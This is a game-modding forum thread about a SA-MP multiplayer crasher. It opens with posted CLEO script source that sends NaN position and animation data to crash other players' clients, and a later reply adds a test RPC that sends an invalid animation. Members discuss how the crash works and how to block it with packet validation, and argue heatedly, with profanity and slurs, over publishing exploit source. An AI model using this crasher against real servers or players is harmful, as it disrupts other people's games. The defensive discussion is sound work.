[DeMoo]

PHP код:

:RPC_INCOMING
0BE5: raknet 8@ = get_hook_param PARAM_PACKETID
IF 0039:   8@ == 19
    THEN
    0BE5: raknet 8@ = get_hook_param PARAM_BITSTREAM
    0BE9: raknet bit_stream 8@ reset_read_pointer
    0BE7: raknet 16@ = bit_stream_read 8@ type BS_TYPE_FLOAT
    IF 0039:   16@ == 2143289344
        THEN
        0BE0: raknet hook_ret FALSE
    END
    0BE9: raknet bit_stream 8@ reset_read_pointer
END
IF 0039:   8@ == 86
    THEN
    0BE5: raknet 8@ = get_hook_param PARAM_BITSTREAM
    0BE9: raknet bit_stream 8@ reset_read_pointer
    0BE7: raknet 9@ = bit_stream_read 8@ type BS_TYPE_SHORT // WORD (PLAYER ID)
    0B2B: samp 10@ = get_player_id_by_actor_handle $PLAYER_ACTOR   
    IF 003B:   10@ == 9@
        THEN
        0BE7: raknet 11@ = bit_stream_read 8@ type BS_TYPE_BYTE // animlib[strlen]
        0BE8: raknet bit_stream 8@ read_array 12@ size 11@ // animlib[char]
        0C1E: array 12@ element 11@ el_size 1 = 0
        0BE7: raknet 13@ = bit_stream_read 8@ type BS_TYPE_BYTE // animname[strlen]
        0BE8: raknet bit_stream 8@ read_array 14@ size 13@ // animname[char]
        0C1E: array 14@ element 13@ el_size 1 = 0
        0B59: samp 15@ = animation_id_by_name 14@ file 12@
        IF OR
        0039:   15@ == 37
        0039:   15@ == 39
        0039:   15@ == 589
            THEN
            0BE0: raknet hook_ret FALSE
        END
    END
    0BE9: raknet bit_stream 8@ reset_read_pointer
END
0BE0: raknet hook_ret TRUE
END
0B43: samp cmd_ret
:SAYKISKA // 0AB1: call_scm_func @SAYKISKA 1 | ID |
0B20: samp 1@ = actor_handle_by_samp_player_id 0@
00A0: store_actor 1@ position_to 2@ 3@ 4@
0B2B: samp 5@ = get_player_id_by_actor_handle $PLAYER_ACTOR
0AC8: 6@ = allocate_memory_size 68
0BBA: samp store_player 5@ onfoot_data 6@
0C0D: struct 6@ offset 6 size 4 = 2@
0C0D: struct 6@ offset 10 size 4 = 3@
0C0D: struct 6@ offset 14 size 4 = 4@
0C0D: struct 6@ offset 18 size 4 = 0x07fc00000
0C0D: struct 6@ offset 22 size 4 = 0x07fc00000
0C0D: struct 6@ offset 26 size 4 = 0x07fc00000
0BC0: samp send_onfoot_data 6@
0AF9: samp say_msg "/crash %d" 0@
0C83: samp force_onfoot_sync
0AC9: free_allocated_memory 6@        
0AB2: ret 0 


this is crasher source, anyone know how it working? and how can i make anti cheat for this crasher?

[DeMoo]

anyone?

[Dayrion]

This is the same as ApplyAnimation.

Quote:

An invalid animation library will crash the player's game

You can only intercept RPC but I don't know if that possible to read it to pass some tests and check if everything is fine.

[Whale]

This exploit is being used in many servers now. any Possible patch?

[ShihabSoft]

Not sure of how it works, mostly it looks like the old animation crasher, which sends invalid animation index to other players to be synced and the players without anticrasher.cs would crash.

If you've the full source, feel free to PM me I will take a deep look.

[J0sh...]

That is the full source.
Animation stuff (iirc) in ID_FOOT_SYNC are being sent 0x07fc00000 (2143289344) not sure why such protection has not been added yet.

[Sew_Sumi]

Why'd you think it was a good idea to post the source of this?



This is wonderful for those who now want to crash servers........ SMH...


How has this stayed up for so long and not been pulled, or thought about....

[Whale]

Quote:

Originally Posted by Sew_Sumi Why'd you think it was a good idea to post the source of this? This is wonderful for those who now want to crash servers........ SMH... How has this stayed up for so long and not been pulled, or thought about....

Yes, Remove the threads ,Dont Provide a patch. let the server owners deal with this exploit themselves.

[Sew_Sumi]

Quote:

Originally Posted by Whale Yes, Remove the threads ,Dont Provide a patch. let the server owners deal with this exploit themselves.

You do realize that if you post an exploit up on ANY dev forum YOU DON'T POST THE EXPLOIT SOURCE IN YOUR REPORT.......



Jesus, do you guys actually think at all?

Nothing to do with removing the thread, it's the fucking sourcxe code which is obviously something which is causing issue, which is now posted...



Thanks guys, for SPREADING the problem and making it so EVERY script kiddie and their mongrel dog, can pick up this shit, and start fucking over all your servers.



Like, seriously... Do you advertise to your neighbourhood that your side door lock is broken, and let all and sundry know, or do you get it fixed?


You get it fixed, because if you tell everyone, you'll end up being ripped off.....





If you think that posting the source is fine, then I'm thinking that you're a complete retard.

Quote:

Originally Posted by Whale This exploit is being used in many servers now.

Quote:

Originally Posted by Whale Yes, Remove the threads ,Dont Provide a patch. let the server owners deal with this exploit themselves.

Hey, lets not remove the thread, or the source and see how much more your server will crash thanks to the above who posted the source code of the crasher....

Wonderful idiocy there...


And to be clear...

Quote:

Originally Posted by Whale Yes, Remove the threads

I'm not an advocate for removing the thread, I'm an advocate for not posting source code for exploits so that every idiot can get it and use it.

All I'd have liked to have had is someone think if it was wise to even post it, as even if there are people who aren't being affected, now, if anyone doesn't like a server themselves, the tools provided in here, make it so it's able to be attacked, thanks solely to the OP...

Now, OP, remove the source code so this can actually be a discussion, not just a source of the attack. Like, come on, what in the fuck were you thinking.....

[ShihabSoft]

Quote:

Originally Posted by Freshncool That is the full source. Animation stuff (iirc) in ID_FOOT_SYNC are being sent 0x07fc00000 (2143289344) not sure why such protection has not been added yet.

Ya I've just happened to check it, you're right.

I've tested the above in multiple servers, which is 0.3.7 R2. Looks like 0.3.7 R2 is not affected.

[Whale]

Quote:

Originally Posted by Sew_Sumi You do realize that if you post an exploit up on ANY dev forum YOU DON'T POST THE EXPLOIT SOURCE IN YOUR REPORT....... Jesus, do you guys actually think at all? Nothing to do with removing the thread, it's the fucking sourcxe code which is obviously something which is causing issue, which is now posted... Thanks guys, for SPREADING the problem and making it so EVERY script kiddie and their mongrel dog, can pick up this shit, and start fucking over all your servers. Like, seriously... Do you advertise to your neighbourhood that your side door lock is broken, and let all and sundry know, or do you get it fixed? You get it fixed, because if you tell everyone, you'll end up being ripped off..... If you think that posting the source is fine, then I'm thinking that you're a complete retard. Hey, lets not remove the thread, or the source and see how much more your server will crash thanks to the above who posted the source code of the crasher.... Wonderful idiocy there... And to be clear... I'm not an advocate for removing the thread, I'm an advocate for not posting source code for exploits so that every idiot can get it and use it. All I'd have liked to have had is someone think if it was wise to even post it, as even if there are people who aren't being affected, now, if anyone doesn't like a server themselves, the tools provided in here, make it so it's able to be attacked, thanks solely to the OP... Now, OP, remove the source code so this can actually be a discussion, not just a source of the attack. Like, come on, what in the fuck were you thinking.....

Alight, So Others are supposed to "GUESS" the mechanism of the exploit? Or does the OP has to Pm the code to every one of them here? Yes, I think this is good idea that he posted the more mainstream the exploit becomes the more important people here will consider to patch this shit. Common f*kin sense right here buddy. Instead of Criticism , How about looking into it and offer a patch? Contribute!

--OP Don't remove The source code so kids can use it to other servers and the developers can create a hype to FIX this ASAP. also code also saves the efforts of making assumptions and help patch the exploit fast

[NaS]

Intercept the RPC, check the animation library and name or index if it is valid and if it is invalid, block it.

https://gtagmodding.com/forums/index.php?showtopic=35

Make an array of these, get the animation indexes of all of them and you have an array for valid animations.
The index of the array should be the animation ID as that is way more efficient than looping an array and comparing strings or IDs.

That's for an invalid animation index. But that is probably not all it does.

Quote:

Originally Posted by Whale Alight, So Others are supposed to "GUESS" the mechanism of the exploit? Or does the OP has to Pm the code to every one of them here? Yes, I think this is good idea that he posted the more mainstream the exploit becomes the more important people here will consider to patch this shit. Common f*kin sense right here buddy.

Find out what exactly it does and how it works, then post that info instead of the source code.
If you must, talk to someone who's experienced enough to find that out before posting.

[Dayrion]

Quote:

Originally Posted by NaS Intercept the RPC, check the animation library and name or index if it is valid and if it is invalid, block it. https://gtagmodding.com/forums/index.php?showtopic=35 Make an array of these, get the animation indexes of all of them and you have an array for valid animations. The index of the array should be the animation ID as that is way more efficient than looping an array and comparing strings or IDs. That's for an invalid animation index. But that is probably not all it does. ...

I tried something similar and it didn't works. I sent a RPC with a invalid animation to the player. The player crash and the RPC dosn't reach pawn callbacks (using Pawn.RakNet plugin).
Maybe, I've done something wrong.

PHP код:

public OnIncomingPacket(playerid, packetid, BitStream:bs)
{
    if(packetid == 0xCF)
    {
        new read_data[PR_OnFootSync];
        BS_ReadOnFootSync(bs, read_data);
        printf("[Inc. Packet 0xCF] Animation id: %i - Flags: %b (%i)", read_data[PR_animationId], read_data[PR_animationFlags], read_data[PR_animationFlags]);
    }
    return 1;
}
CMD:testrpcv(playerid)
{
    new BitStream:bs = BS_New();
    
    BS_WriteValue(bs, 
        PR_UINT16, playerid, 
        PR_UINT8, strlen(" "),
        PR_STRING, " ",
        PR_UINT8, strlen(" "),
        PR_STRING, " ",
        PR_FLOAT, 4.1,
        PR_BOOL, 0,
        PR_BOOL, 0,
        PR_BOOL, 0,
        PR_BOOL, 0,
        PR_UINT32, 1000);
    BS_RPC(bs, playerid, 0x56);
    BS_Delete(bs);
} 


[NaS]

Quote:

Originally Posted by Dayrion I tried something similar and it didn't works. I sent a RPC with a invalid animation to the player. The player crash and the RPC dosn't reach pawn callbacks (using Pawn.RakNet plugin). Maybe, I've done something wrong. PHP код: public OnIncomingPacket(playerid, packetid, BitStream:bs) {     if(packetid == 0xCF)     {         new read_data[PR_OnFootSync];         BS_ReadOnFootSync(bs, read_data);         printf("[Inc. Packet 0xCF] Animation id: %i - Flags: %b (%i)", read_data[PR_animationId], read_data[PR_animationFlags], read_data[PR_animationFlags]);     }     return 1; } CMD:testrpcv(playerid) {     new BitStream:bs = BS_New();          BS_WriteValue(bs,          PR_UINT16, playerid,          PR_UINT8, strlen(" "),         PR_STRING, " ",         PR_UINT8, strlen(" "),         PR_STRING, " ",         PR_FLOAT, 4.1,         PR_BOOL, 0,         PR_BOOL, 0,         PR_BOOL, 0,         PR_BOOL, 0,         PR_UINT32, 1000);     BS_RPC(bs, playerid, 0x56);     BS_Delete(bs); }

Why would that RPC reach the server? It gets sent to the player which then cannot further distribute it since they crashed.

You'll need to send an invalid animation from the client to the server. Or, to test, apply an animation to the player that is valid. If it can be intercepted, it should also work for invalid ones.
Otherwise just use the exploit which should be the best way to test anyway.

Also I think you must ignore the first 8 bits for the info to be correct, since the packet identifier is not part of the enum.

[Sew_Sumi]

Quote:

Originally Posted by Whale [1]Alight, So Others are supposed to "GUESS" the mechanism of the exploit? Or does the OP has to Pm the code to every one of them here? [2]Yes, I think this is good idea that he posted the more mainstream the exploit becomes the more important people here will consider to patch this shit. [3]Common f*kin sense right here buddy. Instead of Criticism , How about looking into it and offer a patch? Contribute! [4]--OP Don't remove The source code so kids can use it to other servers and the developers can create a hype to FIX this ASAP. also code also saves the efforts of making assumptions and help patch the exploit fast

I'll highlight your 'points' and address them as follows...

1] Guess? No, you just have to realize that here on the forums, along with people who are scripting, and developing, there are also those who are looking for attacks, such as what would be put up in this scenario by someone who isn't thinking...

After all, there are ways of passing this info on, without releasing it to the general population....

This is why Gggogle have bounties and the sort, so people pass the info to them, rather than using it against them. Now, we aren't going to have that here, but thing is, at least most people who know development and security, don't post source code of suspected exploits to the GENERAL POPULATION....

[2] It's actually very retarded, and completely selfish in this manner... You are DEMANDING something be fixed BY MAKING an exploit more known...

That's absolute retardation there by a country mile, and if you are a dev of ANY project, even if your website, you 'code' is hosted, I hope it gets dropped to shit by a basic exploit, lose everything, and you realize how this shit actually works.

[3] Common sense, would be not to post up code for exploits, but hey, can't let that get in the way of demanding a patch, right?

Oh, and about that 'patch', the previous post before yours says that 0.3.7 R2 isn't affected, so if that's the case, no patch needed?

[4] Good job at showing your avoidance of any advice in regards to this, as thing is, that just shows you're ignorant as to others... After all, you do realise that by encouraging this, (If it actually worked) then you're consigning many servers to being attacked, simply for what......


A patch, which you demand, and get all antsy about, just because someone who knows about the risks of having random people posting up random exploits to the general populace. Too bad for everyone else eh...



Think about that for a minute, and let that sink in...


How would you feel if you were just chilling out, scripting your shit gamemode, to find your server keep crashing, and having no idea why it's happening...


Inconsiderate is only part of the phrase...

[v1k1nG]

Okay I didn't read every line, so sorry if I misunderstood anything.

Agreed, it is risky. But if anyone is interested in studying cheats he could simply download the files and get a look into it without getting it here, with all these hacking communities around . Also an exploit it is, but a fix would be worth taking the risk. Maybe this will all end up in a client update.. And that'd be good!
Last but not less important is the fact that developers should talk and discuss about everything related to their works to improve theirselves and their crafts everytime.

[Sew_Sumi]

Errr, this isn't exactly just a hack... This was rumoured to crash the server, which is a little more serious than just hacking on a server...


And as I mentioned before, posting this out in an attempt to force an update (Or even glorifying this as a way to get a patch) is straight up stupid...

What if it ends up with someone just saying 'Fuck it, and fuck it all" and shuts down the whole mod? Then what?

Did you just fuck it all by that ideal?

[ShihabSoft]

Guys guys, calm your tits! This shit won't work in R2. And most of the servers are R2 and above. Not a major exploit considering the current scenario.

[v1k1nG]

I dont mind bad words but there is a consistent use of **** here

[Sew_Sumi]

Quote:

Originally Posted by ShihabSoft Guys guys, calm your tits! This shit won't work in R2. And most of the servers are R2 and above. Not a major exploit considering the current scenario.

It's the simple fact that by posting the source, they're not thinking of anyone else other than themselves.

It is also good that you've tested it, but I hope that you did that on your own server, not to other peoples servers without advising the owners/admins.